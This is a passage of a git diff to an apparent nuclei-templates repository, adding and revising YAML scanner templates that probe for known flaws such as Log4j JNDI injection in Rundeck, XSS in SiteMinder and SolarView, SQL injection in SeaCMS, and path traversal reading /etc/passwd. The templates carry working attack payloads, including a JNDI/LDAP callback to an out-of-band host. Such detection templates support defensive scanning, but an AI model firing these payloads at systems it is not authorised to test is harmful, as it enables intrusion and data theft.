     - https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html
-  tags: rockmongo,xss
+  tags: rockmongo,xss,packetstorm
 
 requests:
   - method: POST
diff --git a/vulnerabilities/other/rundeck-log4j.yaml b/vulnerabilities/other/rundeck-log4j.yaml
new file mode 100644
index 0000000000..567f55d1c2
--- /dev/null
+++ b/vulnerabilities/other/rundeck-log4j.yaml
@@ -0,0 +1,53 @@
+id: rundeck-log4j
+
+info:
+  name: Rundeck - Remote Code Execution (Apache Log4j)
+  author: DhiyaneshDK
+  severity: critical
+  reference:
+    - https://docs.rundeck.com/docs/history/CVEs/log4j.html
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  metadata:
+    verified: true
+    shodan-query: title:"Rundeck"
+  tags: cve,cve2021,rce,jndi,log4j,rundeck
+
+requests:
+  - raw:
+      - |
+        POST /j_security_check HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{BaseURL}}
+        Connection: close
+        Referer: {{BaseURL}}/user/login
+
+        j_username=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&j_password=admin
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+'  # Match for extracted ${sys:os.name} variable
+
+    extractors:
+      - type: kval
+        kval:
+          - interactsh_ip # Print remote interaction IP in output
+
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${sys:os.name} in output
diff --git a/vulnerabilities/other/sap-redirect.yaml b/vulnerabilities/other/sap-redirect.yaml
index 906e0b928c..fdb3dab9d7 100644
--- a/vulnerabilities/other/sap-redirect.yaml
+++ b/vulnerabilities/other/sap-redirect.yaml
@@ -11,7 +11,7 @@ requests:
   - method: GET
 
     path:
-      - "{{BaseURL}}/sap/public/bc/icf/logoff?redirecturl=https://example.com"
+      - "{{BaseURL}}/sap/public/bc/icf/logoff?redirecturl=https://interact.sh"
 
     matchers-condition: and
     matchers:
@@ -22,7 +22,7 @@ requests:
 
       - type: word
         words:
-          - "Location: https://www.example.com"
-          - "Location: https://example.com"
+          - "Location: https://www.interact.sh"
+          - "Location: https://interact.sh"
         condition: or
         part: header
diff --git a/vulnerabilities/other/sar2html-rce.yaml b/vulnerabilities/other/sar2html-rce.yaml
index d8d654126f..f85b537cc8 100644
--- a/vulnerabilities/other/sar2html-rce.yaml
+++ b/vulnerabilities/other/sar2html-rce.yaml
@@ -1,14 +1,18 @@
 id: sar2html-rce
 
 info:
-  name: sar2html 3.2.1 - 'plot' Remote Code Execution
+  name: sar2html 3.2.1 - Remote Command Injection
   author: gy741
   severity: critical
-  description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could
-    exploit this vulnerability to execute arbitrary commands on the system.
+  description: |
+    SAR2HTML could allow a remote attacker to execute arbitrary commands on the system via a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system.
   reference:
     - https://www.exploit-db.com/exploits/49344
-  tags: sar2html,rce,oast
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  tags: sar2html,rce,oast,edb
 
 requests:
   - raw:
@@ -22,3 +26,5 @@ requests:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/seacms-sqli.yaml b/vulnerabilities/other/seacms-sqli.yaml
index 1eb29a5bc1..1245702c75 100644
--- a/vulnerabilities/other/seacms-sqli.yaml
+++ b/vulnerabilities/other/seacms-sqli.yaml
@@ -8,10 +8,13 @@ info:
     - https://www.uedbox.com/post/54561/
   tags: seacms,sqli
 
+variables:
+  num: "999999999"
+
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`"
+      - "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5({{num}})))),@`%27`"
 
     redirects: true
     max-redirects: 2
@@ -20,7 +23,7 @@ requests:
       - type: word
         part: body
         words:
-          - "6f7c6dcbc380aac3bcba1f9fccec991e"
+          - '{{md5({{num}})}}'
 
       - type: status
         status:
diff --git a/vulnerabilities/other/seowon-router-rce.yaml b/vulnerabilities/other/seowon-router-rce.yaml
index 527e8bffe9..a24dc18873 100644
--- a/vulnerabilities/other/seowon-router-rce.yaml
+++ b/vulnerabilities/other/seowon-router-rce.yaml
@@ -4,10 +4,15 @@ info:
   name: Seowon 130-SLC router -  Remote Code Execution
   author: gy741
   severity: critical
-  description: Execute commands without authentication as admin user, To use it in all versions, we only enter the router ip & Port(if available) in the request The result of the request is visible on the browser page
+  description: |
+    Seowon 130-SLC router lets remote attackers execute commands without authentication as admin users via the router ip & Port(if available) in the request.
   reference:
     - https://www.exploit-db.com/exploits/50295
-  tags: rce,seowon,router,unauth,iot
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  tags: unauth,iot,edb,rce,seowon,router
 
 requests:
   - raw:
@@ -30,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/showdoc-file-upload-rce.yaml b/vulnerabilities/other/showdoc-file-upload-rce.yaml
index 8b382f16d5..10f0f470eb 100644
--- a/vulnerabilities/other/showdoc-file-upload-rce.yaml
+++ b/vulnerabilities/other/showdoc-file-upload-rce.yaml
@@ -1,12 +1,18 @@
 id: showdoc-file-upload-rce
 
 info:
-  name: Showdoc < 2.8.6 File Upload RCE
+  name: Showdoc <2.8.6 - Remote Code Execution
   author: pikpikcu
   severity: critical
+  description: |
+    Showdoc versions before 2.8.6 is susceptible to remote code execution.
   reference:
     - https://github.com/star7th/showdoc/pull/1059
-  tags: rce,fileupload,showdoc
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  tags: rce,fileupload,showdoc,oss,intrusive
 
 requests:
   - raw:
@@ -25,6 +31,7 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - '"url":"http:'
           - '"success":1'
@@ -37,4 +44,6 @@ requests:
     extractors:
       - type: json
         json:
-          - '.url'
\ No newline at end of file
+          - '.url'
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/sick-beard-xss.yaml b/vulnerabilities/other/sick-beard-xss.yaml
index 5f0c2f5855..271e09dce1 100644
--- a/vulnerabilities/other/sick-beard-xss.yaml
+++ b/vulnerabilities/other/sick-beard-xss.yaml
@@ -1,7 +1,7 @@
 id: sick-beard-xss
 
 info:
-  name: Sick Beard XSS
+  name: Sick Beard Cross-Site Scripting
   author: pikpikcu
   severity: medium
   reference:
diff --git a/vulnerabilities/other/siteminder-dom-xss.yaml b/vulnerabilities/other/siteminder-dom-xss.yaml
new file mode 100644
index 0000000000..9dde49a481
--- /dev/null
+++ b/vulnerabilities/other/siteminder-dom-xss.yaml
@@ -0,0 +1,35 @@
+id: siteminder-dom-xss
+
+info:
+  name: SiteMinder - DOM based Cross-Site Scripting
+  author: clarkvoss
+  severity: medium
+  description: SiteMinder DOM Based XSS.
+  reference: https://blog.reigningshells.com/2019/12/reviving-old-cves-reflected-xss-in-ca.html
+  metadata:
+    verified: true
+    google-query: inurl:"smpwservices.fcc"
+  tags: dom,xss,siteminder
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/siteminderagent/forms/smpwservices.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7'
+      - '{{BaseURL}}/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - '\u003d\u0022confirm(document.domain)\u0022\u003e</B> you cannot access your'
+
+      - type: word
+        part: header
+        words:
+          - 'text/html'
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/other/sl-studio-lfi.yaml b/vulnerabilities/other/sl-studio-lfi.yaml
index 15e7f3d46c..4ae06e01eb 100644
--- a/vulnerabilities/other/sl-studio-lfi.yaml
+++ b/vulnerabilities/other/sl-studio-lfi.yaml
@@ -1,13 +1,18 @@
 id: sl-studio-lfi
 
 info:
-  name: Webbdesign SL-Studio Directory Traversal
+  name: Webbdesign SL-Studio - Local File Inclusion
   author: 0x_Akoko
   severity: high
+  description: Webbdesign SL-Studio is vulnerable to local file inclusion.
   reference:
     - https://cxsecurity.com/issue/WLB-2018110187
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   metadata:
-    google-dork: 'inurl:index.php?page= intext:Webbdesign: SL-Studio.'
+    google-query: 'inurl:index.php?page= intext:Webbdesign: SL-Studio.'
   tags: slstudio,lfi
 
 requests:
@@ -24,3 +29,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/04
diff --git a/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml b/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml
index 88c4402fbb..0a55207510 100644
--- a/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml
+++ b/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml
@@ -1,16 +1,20 @@
 id: sofneta-mecdream-pacs-lfi
 
 info:
-  name: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal
+  name: Softneta MedDream PACS Server Premium 6.7.1.1 - Local File Inclusion
   author: 0x_akoko
   severity: high
-  description: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal
+  description: Softneta MedDream PACS Server Premium 6.7.1.1 is vulnerable to local file inclusion.
   reference:
     - https://www.exploit-db.com/exploits/45347
     - https://www.softneta.com/products/meddream-pacs-server/downloads.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   metadata:
-    google-dork: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login
-  tags: sofneta,lfi
+    google-query: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login
+  tags: sofneta,lfi,edb
 
 requests:
   - method: GET
@@ -25,3 +29,5 @@ requests:
           - "fonts"
           - "extensions"
         condition: and
+
+# Enhanced by mp on 2022/08/04
diff --git a/vulnerabilities/other/solar-log-authbypass.yaml b/vulnerabilities/other/solar-log-authbypass.yaml
index bc839a4439..305f426d9f 100644
--- a/vulnerabilities/other/solar-log-authbypass.yaml
+++ b/vulnerabilities/other/solar-log-authbypass.yaml
@@ -10,7 +10,7 @@ info:
     - https://www.exploit-db.com/exploits/49986
   classification:
     cwe-id: CWE-284
-  tags: solarlog,auth-bypass
+  tags: solarlog,auth-bypass,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/other/solarview-compact-xss.yaml b/vulnerabilities/other/solarview-compact-xss.yaml
new file mode 100644
index 0000000000..aa9b72ec3d
--- /dev/null
+++ b/vulnerabilities/other/solarview-compact-xss.yaml
@@ -0,0 +1,33 @@
+id: solarview-compact-xss
+
+info:
+  name: SolarView Compact 6.00 - Cross-Site Scripting
+  author: ritikchaddha
+  severity: medium
+  description: |
+    SolarView Compact v6.0 is vulnerable to cross-site scripting (XSS) vulnerability via `fname` at /Solar_Image.php.
+  metadata:
+    verified: true
+    shodan-query: http.html:"SolarView Compact"
+  tags: xss,solarview
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/Solar_Image.php?mode=resize&fname=test%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'value="test"><script>alert(document.domain)</script>">'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml
index d82664d278..36b6f701e6 100644
--- a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml
+++ b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml
@@ -1,13 +1,18 @@
 id: sonicwall-sslvpn-shellshock
 
 info:
-  name: Sonicwall SSLVPN ShellShock RCE
+  name: Sonicwall SSLVPN - Remote Code Execution (ShellShock)
   author: PR3R00T
   severity: critical
-  description: A vulnerability in Sonicwall SSLVPN contains a 'ShellShock' vulnerability which allows remote unauthenticated attackers to execute arbitrary commands.
+  description: |
+    Sonicwall SSLVPN contains a 'ShellShock' vulnerability which allows remote unauthenticated attackers to execute arbitrary commands.
   reference:
     - https://twitter.com/chybeta/status/1353974652540882944
     - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: shellshock,sonicwall,rce,vpn
 
 requests:
@@ -21,9 +26,12 @@ requests:
     matchers-condition: and
     matchers:
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
-        part: body
+
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/spark-webui-unauth.yaml b/vulnerabilities/other/spark-webui-unauth.yaml
index 6ca1120cb0..562ef064d8 100644
--- a/vulnerabilities/other/spark-webui-unauth.yaml
+++ b/vulnerabilities/other/spark-webui-unauth.yaml
@@ -6,7 +6,7 @@ info:
   severity: medium
   reference:
     - https://github.com/vulhub/vulhub/tree/master/spark/unacc
-  tags: spark,unauth
+  tags: unauth,vulhub,spark
 
 requests:
   - method: GET
diff --git a/vulnerabilities/other/sponip-network-system-ping-rce.yaml b/vulnerabilities/other/sponip-network-system-ping-rce.yaml
index 98ed9e10b1..f5411de1dc 100644
--- a/vulnerabilities/other/sponip-network-system-ping-rce.yaml
+++ b/vulnerabilities/other/sponip-network-system-ping-rce.yaml
@@ -1,11 +1,17 @@
 id: sponip-network-system-ping-rce
 
 info:
-  name: Sponip Network System Ping RCE
+  name: Sponip Network System Ping - Remote Code Execution
   author: pikpikcu
   severity: critical
+  description: |
+    Sponip Network System Ping is susceptible to remote code execution.
   reference:
     - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c735e3e9
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: sponip,rce,oast,network
 
 requests:
@@ -23,3 +29,5 @@ requests:
         name: http
         words:
           - "http"
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/surrealtodo-lfi.yaml b/vulnerabilities/other/surrealtodo-lfi.yaml
new file mode 100644
index 0000000000..192c0a9844
--- /dev/null
+++ b/vulnerabilities/other/surrealtodo-lfi.yaml
@@ -0,0 +1,34 @@
+id: surrealtodo-lfi
+
+info:
+  name: Surreal ToDo 0.6.1.2 - Local File Inclusion
+  author: arafatansari
+  severity: high
+  description: |
+    Surreal ToDo 0.6.1.2 is vulnerable to local file inclusion via index.php and the content parameter.
+  reference:
+    - https://www.exploit-db.com/exploits/45826
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+  tags: surreal,lfi,edb
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?content=../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/04
diff --git a/vulnerabilities/other/symantec-messaging-gateway.yaml b/vulnerabilities/other/symantec-messaging-gateway.yaml
index ab5c216ab1..5e32b82103 100644
--- a/vulnerabilities/other/symantec-messaging-gateway.yaml
+++ b/vulnerabilities/other/symantec-messaging-gateway.yaml
@@ -1,10 +1,14 @@
 id: symantec-messaging-gateway
 
 info:
-  name: Symantec Messaging Gateway LFI
+  name: Symantec Messaging Gateway <=10.6.1 - Local File Inclusion
   author: Random_Robbie
-  severity: medium
-  description: Symantec Messaging Gateway <= 10.6.1 Directory Traversal
+  severity: high
+  description: Symantec Messaging Gateway 10.6.1 and prior are vulnerable to local file inclusion.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: lfi,messaging,symantec
 
 requests:
@@ -21,3 +25,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/04
diff --git a/vulnerabilities/other/tamronos-rce.yaml b/vulnerabilities/other/tamronos-rce.yaml
index 2b473e957c..581c85bc75 100644
--- a/vulnerabilities/other/tamronos-rce.yaml
+++ b/vulnerabilities/other/tamronos-rce.yaml
@@ -1,11 +1,17 @@
 id: tamronos-rce
 
 info:
-  name: TamronOS IPTV/VOD RCE
+  name: TamronOS IPTV/VOD - Remote Command Execution
   author: pikpikcu
   severity: critical
+  description: |
+    TamronOS IPTV/VOD contains a remote command execution in the 'host' parameter of the /api/ping endpoint.
   reference:
     - https://twitter.com/sec715/status/1405336456923471874
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-78
   metadata:
     verified: true
     shodan-query: title:"TamronOS IPTV系统"
@@ -27,3 +33,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by cs on 2022/05/13
diff --git a/vulnerabilities/other/thinkific-redirect.yaml b/vulnerabilities/other/thinkific-redirect.yaml
index 90dc713ceb..a5baf35e95 100644
--- a/vulnerabilities/other/thinkific-redirect.yaml
+++ b/vulnerabilities/other/thinkific-redirect.yaml
@@ -10,7 +10,7 @@ requests:
   - method: GET
 
     path:
-      - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://evil.com"
+      - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://interact.sh"
 
     matchers-condition: and
     matchers:
@@ -19,6 +19,6 @@ requests:
           - 302
       - type: word
         words:
-          - "<a href=\"http://evil.com?kind=jwt&amp;message=Nil+JSON+web+token\""
+          - "<a href=\"http://interact.sh?kind=jwt&amp;message=Nil+JSON+web+token\""
         condition: or
         part: body
diff --git a/vulnerabilities/other/thruk-xss.yaml b/vulnerabilities/other/thruk-xss.yaml
index 5a5051619b..5716c8063e 100644
--- a/vulnerabilities/other/thruk-xss.yaml
+++ b/vulnerabilities/other/thruk-xss.yaml
@@ -1,12 +1,17 @@
 id: thruk-xss
 
 info:
-  name: Thruk Monitoring Webinterface - XSS
-  author: pikpikcu
+  name: Thruk Monitoring Webinterface - Cross-Site Scripting
+  author: pikpikcu,ritikchaddha
   severity: medium
+  description: |
+    Thruk login page is vulnerable to Reflected XSS via the login parameter at /thruk/cgi-bin/login.cgi.
   reference:
     - https://www.thruk.org/download.html
-  tags: xss,thruk
+  metadata:
+    verified: true
+    shodan-query: http.html:"Thruk"
+  tags: thruk,xss
 
 requests:
   - raw:
@@ -14,22 +19,20 @@ requests:
         POST /thruk/cgi-bin/login.cgi HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
-        Referer: {{Hostname}}/thruk/cgi-bin/login.cgi?thruk
 
-        referer=%2Fthruk&login=--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&password=Thruk+Monitoring+Webinterface
+        referer=&login=%22%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%40gmail.com&password=test&submit=Login
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
       - type: word
-        part: body
         words:
-          - "</script><script>alert(document.domain)</script>"
+          - "<svg/onload=alert(document.domain)>\"@gmail.com') called at"
 
       - type: word
         part: header
         words:
           - "text/html"
+
+      - type: status
+        status:
+          - 500
diff --git a/vulnerabilities/other/tikiwiki-json-rpc.yaml b/vulnerabilities/other/tikiwiki-json-rpc.yaml
index 8d026c20d8..798471ff80 100644
--- a/vulnerabilities/other/tikiwiki-json-rpc.yaml
+++ b/vulnerabilities/other/tikiwiki-json-rpc.yaml
@@ -10,7 +10,7 @@ info:
     - https://github.com/act1on3/nuclei-templates/blob/master/vulnerabilities/kiwi-information-disclosure.yaml
   metadata:
     shodan-query: title:"Kiwi TCMS - Login",http.favicon.hash:-1909533337
-  tags: kiwitcms,exposure,misconfig
+  tags: kiwitcms,exposure,misconfig,hackerone
 
 requests:
   - raw:
diff --git a/vulnerabilities/other/tikiwiki-reflected-xss.yaml b/vulnerabilities/other/tikiwiki-reflected-xss.yaml
index 6283ecd6fd..fc44d20757 100644
--- a/vulnerabilities/other/tikiwiki-reflected-xss.yaml
+++ b/vulnerabilities/other/tikiwiki-reflected-xss.yaml
@@ -1,7 +1,7 @@
 id: tikiwiki-reflected-xss
 
 info:
-  name: Tiki Wiki CMS Groupware 5.2 Reflected Cross-site Scripting
+  name: Tiki Wiki CMS Groupware 5.2 Cross-Site Scripting
   author: madrobot
   severity: medium
   tags: xss,tikiwiki
diff --git a/vulnerabilities/other/tpshop-directory-traversal.yaml b/vulnerabilities/other/tpshop-directory-traversal.yaml
index e88bb55f43..2fd11e7655 100644
--- a/vulnerabilities/other/tpshop-directory-traversal.yaml
+++ b/vulnerabilities/other/tpshop-directory-traversal.yaml
@@ -1,11 +1,16 @@
 id: tpshop-directory-traversal
 
 info:
-  name: TPshop Directory Traversal
+  name: TPshop - Local File Inclusion
   author: pikpikcu
+  description: TPshop is vulnerable to local file inclusion.
   severity: high
   reference:
     - https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: tpshop,lfi
 
 requests:
@@ -23,3 +28,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/04
diff --git a/vulnerabilities/other/turbocrm-xss.yaml b/vulnerabilities/other/turbocrm-xss.yaml
index 2f99cb2f82..09e6ae5ba9 100644
--- a/vulnerabilities/other/turbocrm-xss.yaml
+++ b/vulnerabilities/other/turbocrm-xss.yaml
@@ -1,7 +1,7 @@
 id: turbocrm-xss
 
 info:
-  name: TurboCRM XSS
+  name: TurboCRM Cross-Site Scripting
   author: pikpikcu
   severity: medium
   description: A vulnerability in TurboCRM allows remote attackers to inject arbitrary Javascript into the response returned by the application.
diff --git a/misconfiguration/vulnerabilities/other/umbraco-base-ssrf.yaml b/vulnerabilities/other/umbraco-base-ssrf.yaml
similarity index 55%
rename from misconfiguration/vulnerabilities/other/umbraco-base-ssrf.yaml
rename to vulnerabilities/other/umbraco-base-ssrf.yaml
index 39c49d6239..d68b7f076a 100644
--- a/misconfiguration/vulnerabilities/other/umbraco-base-ssrf.yaml
+++ b/vulnerabilities/other/umbraco-base-ssrf.yaml
@@ -1,17 +1,20 @@
 id: umbraco-base-ssrf
 
 info:
-  name: Umbraco v8.14.1 - 'baseUrl' SSRF
+  name: Umbraco 8.14.1 - baseUrl Server-Side Request Forgery (SSRF)
   author: dhiyaneshDk
   severity: medium
+  description: Umbraco 8.1.4.1 allows attackers to use the baseUrl parameter to several programs to perform a server-side request forgery (SSRF) attack.
   reference:
     - https://www.exploit-db.com/exploits/50462
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
-    cvss-score: 5.3
-    cve-id: CVE-2020-10770
-    cwe-id: CWE-601
-  tags: ssrf,umbraco,oast
+    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 6.8
+    cwe-id: CWE-918
+  metadata:
+    verified: true
+    shodan-query: http.html:"Umbraco"
+  tags: oast,edb,ssrf,umbraco
 
 requests:
   - method: GET
@@ -21,8 +24,18 @@ requests:
       - '{{BaseURL}}/umbraco/backoffice/UmbracoApi/Dashboard/GetRemoteDashboardCss?section=AvoidGetCacheItem&baseUrl=http://{{interactsh-url}}/'
 
     stop-at-first-match: true
+    req-condition: true
+    matchers-condition: and
     matchers:
       - type: word
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
+
+      - type: dsl
+        dsl:
+          - "len(body_1)==0"
+          - "len(body_2)==0"
+          - "len(body_3)==0"
+
+# Enhanced by cs 08/03/2022
diff --git a/vulnerabilities/other/unauth-rlm.yaml b/vulnerabilities/other/unauth-rlm.yaml
deleted file mode 100644
index 057a35f077..0000000000
--- a/vulnerabilities/other/unauth-rlm.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: unauth-rlm
-
-info:
-  name: Unauthenticated Reprise License Manager
-  author: Akincibor
-  severity: critical
-  tags: unauth,rlm
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/goforms/menu"
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        part: body
-        words:
-          - "RLM Administration Commands"
\ No newline at end of file
diff --git a/vulnerabilities/other/unauth-spark-api.yaml b/vulnerabilities/other/unauth-spark-api.yaml
index 504318c39a..75db17c1cf 100644
--- a/vulnerabilities/other/unauth-spark-api.yaml
+++ b/vulnerabilities/other/unauth-spark-api.yaml
@@ -3,7 +3,7 @@ id: unauth-spark-api
 info:
   name: Unauthenticated Spark REST API
   author: princechaddha
-  severity: medium
+  severity: critical
   description: The Spark product's REST API interface allows access to unauthenticated users.
   reference:
     - https://xz.aliyun.com/t/2490
diff --git a/vulnerabilities/other/unifi-network-log4j-rce.yaml b/vulnerabilities/other/unifi-network-log4j-rce.yaml
index 8d823b5ac7..d712b2d473 100644
--- a/vulnerabilities/other/unifi-network-log4j-rce.yaml
+++ b/vulnerabilities/other/unifi-network-log4j-rce.yaml
@@ -1,16 +1,24 @@
 id: unifi-network-log4j-rce
 
 info:
-  name: UniFi Network Log4j JNDI RCE
+  name: UniFi Network Application - Remote Code Execution (Log4j)
   author: KrE80r
   severity: critical
-  description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in an impacted UniFi Network Application .
+  description: |
+    UniFi Network Application is susceptible to a critical vulnerability in Apache Log4j (CVE-2021-44228) that may allow for remote code execution in an impacted implementation.
   reference:
     - https://community.ui.com/releases/UniFi-Network-Application-6-5-55/48c64137-4a4a-41f7-b7e4-3bee505ae16e
     - https://twitter.com/sprocket_ed/status/1473301038832701441
+    - https://logging.apache.org/log4j/2.x/security.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   metadata:
+    verified: true
     shodan-query: http.title:"UniFi Network"
-  tags: rce,log4j,ubnt,unifi,oast,jndi
+  tags: cve,cve2021,rce,log4j,ubnt,unifi,oast,jndi
 
 requests:
   - raw:
@@ -41,3 +49,5 @@ requests:
         group: 1
         regex:
           - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
+
+# Enhanced by mp on 2022/06/03
diff --git a/vulnerabilities/other/vanguard-post-xss.yaml b/vulnerabilities/other/vanguard-post-xss.yaml
index aec8293448..adbac4d5d0 100644
--- a/vulnerabilities/other/vanguard-post-xss.yaml
+++ b/vulnerabilities/other/vanguard-post-xss.yaml
@@ -7,7 +7,7 @@ info:
   description: Persistent Cross-site Scripting in message & product title-tags also there's Non-Persistent Cross-site scripting in product search box
   reference:
     - https://packetstormsecurity.com/files/157099/Vanguard-2.1-Cross-Site-Scripting.html
-  tags: vanguard,xss
+  tags: vanguard,xss,packetstorm
 
 requests:
   - raw:
diff --git a/vulnerabilities/other/viewlinc-crlf-injection.yaml b/vulnerabilities/other/viewlinc-crlf-injection.yaml
